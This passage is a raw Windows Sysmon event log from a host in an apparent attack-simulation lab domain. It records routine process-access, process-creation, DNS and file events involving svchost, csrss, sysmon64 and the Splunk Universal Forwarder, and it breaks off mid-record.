12:23:48.716{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440427Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.716{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440426Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.716{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440425Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.716{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440424Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.716{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440423Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.716{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440422Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.716{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440421Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.716{42DC5269-CE96-6086-0500-00000000BA01}412368C:\Windows\system32\csrss.exe{42DC5269-0254-6088-BE28-00000000BA01}992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440420Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.716{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0254-6088-BE28-00000000BA01}992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440419Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.715{42DC5269-0254-6088-BE28-00000000BA01}992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000440418Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:45.800{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local63672- 23542300x8000000000000000440417Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.441{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9C2722719A57BB4C50B565878940963,SHA256=F587458FCF7099A7508D50F1BBA689DD5EC8FF7FE1A0690B328C32E1F92D83A5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440416Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.181{42DC5269-0254-6088-BD28-00000000BA01}57763572C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440415Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.174{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440414Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.174{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440413Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.052{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0254-6088-BD28-00000000BA01}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440412Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.051{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440411Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.051{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440410Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.051{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440409Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.051{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440408Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.051{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440407Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.051{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440406Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.050{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440405Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.050{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440404Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.050{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440403Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.050{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-0254-6088-BD28-00000000BA01}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440402Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.050{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-0254-6088-BD28-00000000BA01}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440401Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:48.050{42DC5269-0254-6088-BD28-00000000BA01}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000440464Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:49.910{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-0255-6088-C028-00000000BA01}4352C:\Program 